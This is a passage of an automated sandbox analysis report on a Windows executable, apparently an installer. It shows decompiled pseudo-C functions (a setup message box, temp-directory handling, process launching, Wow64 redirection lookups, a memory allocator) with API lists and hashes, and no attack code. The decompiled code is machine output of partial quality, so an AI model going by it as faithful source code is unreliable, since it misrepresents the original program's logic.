                                                            0x00000000
                                                            0x0040435a
                                                            0x00404356
                                                            0x00000000
                                                            0x00404340
                                                            0x00404328
                                                            0x00404379
                                                            0x00404379
                                                            0x00404381
                                                            0x00404385
                                                            0x004043bc
                                                            0x004043bf
                                                            0x004043c2
                                                            0x004043c4
                                                            0x004043ca
                                                            0x004043cc
                                                            0x004043cc
                                                            0x00404387
                                                            0x00404387
                                                            0x00404387
                                                            0x0040438a
                                                            0x0040438a
                                                            0x0040438e
                                                            0x00404392
                                                            0x004043d4
                                                            0x004043d7
                                                            0x004043d9
                                                            0x004043db
                                                            0x004043e1
                                                            0x004043e5
                                                            0x004043e5
                                                            0x004043e1
                                                            0x00404394
                                                            0x0040439a
                                                            0x004043ec
                                                            0x004043f6
                                                            0x00404424
                                                            0x0040442a
                                                            0x0040442f
                                                            0x00404436
                                                            0x00404440
                                                            0x00404446
                                                            0x0040444d
                                                            0x00404451
                                                            0x004043f8
                                                            0x004043f8
                                                            0x004043fb
                                                            0x004043fd
                                                            0x00404400
                                                            0x00404403
                                                            0x00404405
                                                            0x00404414
                                                            0x00404419
                                                            0x0040441c
                                                            0x00404420
                                                            0x00404420
                                                            0x0040439c
                                                            0x0040439f
                                                            0x004043a2
                                                            0x004043aa
                                                            0x004043af
                                                            0x004043b6
                                                            0x004043ba
                                                            0x004043ba
                                                            0x00404290
                                                            0x00404290
                                                            0x00404292
                                                            0x00404298
                                                            0x0040429b
                                                            0x004042a4
                                                            0x004042a7
                                                            0x004042aa
                                                            0x004042ad
                                                            0x004042b0
                                                            0x004042b3
                                                            0x004042b6
                                                            0x004042b6
                                                            0x004042b8
                                                            0x004042b9
                                                            0x0040429d
                                                            0x0040429d
                                                            0x0040429d
                                                            0x0040429f
                                                            0x004042a1
                                                            0x004042a2
                                                            0x004042a2
                                                            0x0040429b
                                                            0x0040428e

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                            • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                            • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                            • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004B60E8, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 165windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				WCHAR* _t63;
				intOrPtr _t69;
				intOrPtr _t74;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t78;
				struct HWND__* _t81;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t120;
				intOrPtr _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t85 = __ebx;
				_pop(_t101);
				_pop(_t88);
				 *[fs:eax] = _t101;
				E004AF678(_t88);
				if( *0x4ba440 == 0) {
					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
						_t61 =  *0x4ba674; // 0x4c0d0c
						_t4 = _t61 + 0x2f8; // 0x0
						_t63 = E004084EC( *_t4);
						_t88 = _t120 - 0x28;
						_t101 =  *0x4c1c48; // 0x0
						E00426F08(0xc2, _t120 - 0x28, _t101);
						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
							 *0x4ba44c = 2;
							E0041F238();
						}
					}
					E004056D0();
					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
					_t26 =  *0x4c1d84; // 0x0
					E00422954(_t26, _t88, _t120 - 0x34);
					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
					_push( *((intOrPtr*)(_t120 - 0x30)));
					_t31 =  *0x4c1d94; // 0x0
					E00422660(_t31, _t120 - 0x38);
					_pop(_t90);
					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
					_t107 =  *0x4c1d98; // 0x0
					E00407E00(0x4c1d9c, _t107);
					_t37 =  *0x4c1d90; // 0x4d703c
					_t15 = _t37 + 0x14; // 0x41c6fb
					_t38 =  *0x4c1d88; // 0x0
					E00423CE8(_t38,  *_t15);
					_push(_t120);
					_push(0x4b63ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t121;
					 *0x4c1de0 = 0;
					_t42 = E00423D00(1, 0, 1, 0); // executed
					 *0x4c1d8c = _t42;
					_push(_t120);
					_push(0x4b639a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t44 =  *0x4c1d90; // 0x4d703c
					_t16 = _t44 + 0x18; // 0x30be00
					 *0x4c1de0 = E004053F0( *_t16);
					_t47 =  *0x4c1d90; // 0x4d703c
					_t17 = _t47 + 0x18; // 0x30be00
					_t86 =  *0x4c1de0; // 0x7fba0010
					E00405884(_t86,  *_t17);
					_push(_t120);
					_push(0x4b62e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t51 =  *0x424cd8; // 0x424d30
					_t93 =  *0x4c1d88; // 0x0
					_t53 = E00424748(_t93, 1, _t51); // executed
					 *0x4c1de4 = _t53;
					_push(_t120);
					_push(0x4b62d8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t55 =  *0x4c1d90; // 0x4d703c
					_t18 = _t55 + 0x18; // 0x30be00
					_t56 =  *0x4c1de4; // 0x22bac00
					E00424A24(_t56,  *_t18, _t86);
					_pop(_t114);
					 *[fs:eax] = _t114;
					_push(E004B62DF);
					_t59 =  *0x4c1de4; // 0x22bac00
					return E00405CE8(_t59);
				} else {
					_t69 =  *0x4ba674; // 0x4c0d0c
					_t1 = _t69 + 0x1d0; // 0x0
					E004AFA44( *_t1, __ebx, __edi, __esi);
					 *0x4ba44c = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E004B6554);
					_t74 =  *0x4c1d88; // 0x0
					_t75 = E00405CE8(_t74);
					if( *0x4c1d9c != 0) {
						_t117 =  *0x4c1d9c; // 0x0
						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
					}
					if( *0x4c1d94 != 0) {
						_t82 =  *0x4c1d94; // 0x0
						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
					}
					if( *0x4ba450 != 0) {
						_t81 =  *0x4ba450; // 0x302cc
						_t75 = DestroyWindow(_t81); // executed
					}
					if( *0x4c1d78 != 0) {
						_t76 =  *0x4c1d78; // 0x0
						_t99 =  *0x4c1d7c; // 0x1
						_t116 =  *0x426bb0; // 0x426bb4
						E00408D08(_t76, _t99, _t116);
						_t78 =  *0x4c1d78; // 0x0
						E0040540C(_t78);
						 *0x4c1d78 = 0;
						return 0;
					}
					return _t75;
				}
			}




































                                                            0x004b60e8
                                                            0x004b60e8
                                                            0x004b60e8
                                                            0x004b60ea
                                                            0x004b60ec
                                                            0x004b60ed
                                                            0x004b610d
                                                            0x004b6119
                                                            0x004b613e
                                                            0x004b614b
                                                            0x004b6150
                                                            0x004b6156
                                                            0x004b615c
                                                            0x004b615f
                                                            0x004b6169
                                                            0x004b6181
                                                            0x004b6183
                                                            0x004b618d
                                                            0x004b618d
                                                            0x004b6181
                                                            0x004b6192
                                                            0x004b619a
                                                            0x004b61a7
                                                            0x004b61af
                                                            0x004b61b4
                                                            0x004b61c4
                                                            0x004b61cc
                                                            0x004b61d0
                                                            0x004b61d5
                                                            0x004b61e2
                                                            0x004b61e3
                                                            0x004b61ed
                                                            0x004b61f3
                                                            0x004b61f8
                                                            0x004b61fd
                                                            0x004b6200
                                                            0x004b6205
                                                            0x004b620c
                                                            0x004b620d
                                                            0x004b6212
                                                            0x004b6215
                                                            0x004b621a
                                                            0x004b6232
                                                            0x004b6237
                                                            0x004b623e
                                                            0x004b623f
                                                            0x004b6244
                                                            0x004b6247
                                                            0x004b624a
                                                            0x004b624f
                                                            0x004b6257
                                                            0x004b625c
                                                            0x004b6261
                                                            0x004b6264
                                                            0x004b626e
                                                            0x004b6275
                                                            0x004b6276
                                                            0x004b627b
                                                            0x004b627e
                                                            0x004b6281
                                                            0x004b6287
                                                            0x004b6294
                                                            0x004b6299
                                                            0x004b62a0
                                                            0x004b62a1
                                                            0x004b62a6
                                                            0x004b62a9
                                                            0x004b62ac
                                                            0x004b62b1
                                                            0x004b62b6
                                                            0x004b62bb
                                                            0x004b62c2
                                                            0x004b62c5
                                                            0x004b62c8
                                                            0x004b62cd
                                                            0x004b62d7
                                                            0x004b611b
                                                            0x004b611b
                                                            0x004b6120
                                                            0x004b6126
                                                            0x004b612d
                                                            0x004b64b5
                                                            0x004b64b8
                                                            0x004b64bb
                                                            0x004b64c0
                                                            0x004b64c5
                                                            0x004b64d1
                                                            0x004b64df
                                                            0x004b64e7
                                                            0x004b64e7
                                                            0x004b64f3
                                                            0x004b64f5
                                                            0x004b6500
                                                            0x004b6500
                                                            0x004b650c
                                                            0x004b650e
                                                            0x004b6514
                                                            0x004b6514
                                                            0x004b6520
                                                            0x004b6522
                                                            0x004b6527
                                                            0x004b652d
                                                            0x004b6533
                                                            0x004b6538
                                                            0x004b653d
                                                            0x004b6544
                                                            0x00000000
                                                            0x004b6544
                                                            0x004b6549
                                                            0x004b6549

                                                            APIs
                                                            • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                              • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                            • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                            • DestroyWindow.USER32(000302CC,004B6554), ref: 004B6514
                                                              • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                              • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                              • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                            • String ID: .tmp$0MB$<pM
                                                            • API String ID: 3858953238-1900878030
                                                            • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                            • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                            • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                            • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF728, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x4af7ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x4af81c);
				_push(__eax);
				_push(0x4af82c);
				_push(__edx);
				E004087C4( &_v8, __eax, 4, __ecx, __edx);
				E00405884( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
				if(_t23 == 0) {
					E004AF34C(0x83, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E004AF6FC();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
				E004AF6FC();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x4af806);
				return E00407A20( &_v8);
			}











                                                            0x004af733
                                                            0x004af736
                                                            0x004af738
                                                            0x004af73a
                                                            0x004af73e
                                                            0x004af73f
                                                            0x004af744
                                                            0x004af747
                                                            0x004af74a
                                                            0x004af74f
                                                            0x004af750
                                                            0x004af755
                                                            0x004af75e
                                                            0x004af76d
                                                            0x004af772
                                                            0x004af798
                                                            0x004af79d
                                                            0x004af79f
                                                            0x004af7a5
                                                            0x004af7a5
                                                            0x004af7ae
                                                            0x004af7b3
                                                            0x004af7b3
                                                            0x004af7cc
                                                            0x004af7d1
                                                            0x004af7db
                                                            0x004af7e4
                                                            0x004af7eb
                                                            0x004af7ee
                                                            0x004af7f1
                                                            0x004af7fe

                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 004AF798
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                            • MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                            • GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                            • CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                              • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                            • String ID: D
                                                            • API String ID: 3356880605-2746444292
                                                            • Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                            • Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
                                                            • Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                            • Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004B5A90, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x4b5b5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				 *0x4c1124 =  *0x4c1124 - 1;
				if( *0x4c1124 < 0) {
					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x4c1130 = _t16;
					E00422D44( &_v12);
					E00422660(_v12,  &_v8);
					E004086E4( &_v8, L"shell32.dll");
					E00421230(_v8, _t27, 0x8000); // executed
					E004232EC(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x4b5b61);
				return E00407A80( &_v16, 3);
			}









                                                            0x004b5a90
                                                            0x004b5a93
                                                            0x004b5a95
                                                            0x004b5a97
                                                            0x004b5a9b
                                                            0x004b5a9c
                                                            0x004b5aa1
                                                            0x004b5aa4
                                                            0x004b5aa7
                                                            0x004b5aae
                                                            0x004b5ac9
                                                            0x004b5ae3
                                                            0x004b5aef
                                                            0x004b5afa
                                                            0x004b5afe
                                                            0x004b5afe
                                                            0x004b5afe
                                                            0x004b5b00
                                                            0x004b5b08
                                                            0x004b5b13
                                                            0x004b5b20
                                                            0x004b5b2d
                                                            0x004b5b3a
                                                            0x004b5b3a
                                                            0x004b5b41
                                                            0x004b5b44
                                                            0x004b5b47
                                                            0x004b5b59

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                            • API String ID: 1646373207-2130885113
                                                            • Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                            • Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
                                                            • Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                            • Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403EE8, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00403EE8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4bb059; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00403C48();
								_t99 =  *0x4bdb80; // 0x4bdb7c
								 *_t147 = 0x4bdb7c;
								 *0x4bdb80 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x4bdb78 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
								_t133 =  *0x4bbaf0; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E00403BCC(_t125);
								} else {
									_t110 =  *0x4bbaec; // 0x22aaad0
									_t109 = _t110 - _t125;
									 *0x4bbaec = _t109;
									 *0x4bbaf0 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4bbae8 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4bbb78 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4bbaf8 + _t142 * 4;
								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4bbaf4], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00403B00(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4bbae8 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4bb059;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4bbae8], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4bbaf0; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E00403BCC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4bbae8 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4bbaec; // 0x22aaad0
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
									 *0x4bbaec = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4bbaf8 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4bbaf8 + __eax * 4;
									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
